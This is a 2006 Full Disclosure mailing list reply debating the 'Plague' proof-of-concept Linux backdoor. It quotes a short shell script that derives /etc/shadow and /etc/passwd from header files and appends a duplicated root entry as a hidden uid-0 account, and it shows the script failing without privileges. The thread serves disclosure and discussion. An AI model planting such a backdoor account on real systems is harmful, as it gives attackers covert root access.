Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Plague Proof of Concept Linux backdoor
From: hijacker () oldum net
Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completly out of the subject and and the same time some of
which offensive to me!

Let's go into more detauls on that backdoor.

I created the file test1.sh containing:

hijacker () hpa:~/hacki$ cat test1.sh
if [ -e /usr/include/paths.h ]


        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2


Then I chmod 700 test1.sh
then I run:

hijacker () hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied

Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

-Nikolay Kichukov

On 22 Oct 06, at 04:29, hijacker () oldum net wrote:
even if they have ssh access, there is still nothing they can do,
to create two files in there $HOME directories containing
expressions from
paths.h and sysexits.h ?

Why would that be considered a backdoor?

The awk commands parse out the strings "/etc/passwd" and "/etc/
shadow" from
the headers. It's still rather easily detected - most of the rootkit-
programs will detect an alternate uid0 account very quickly - but it
demonstrate an interesting way of avoiding target strings in the binary.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]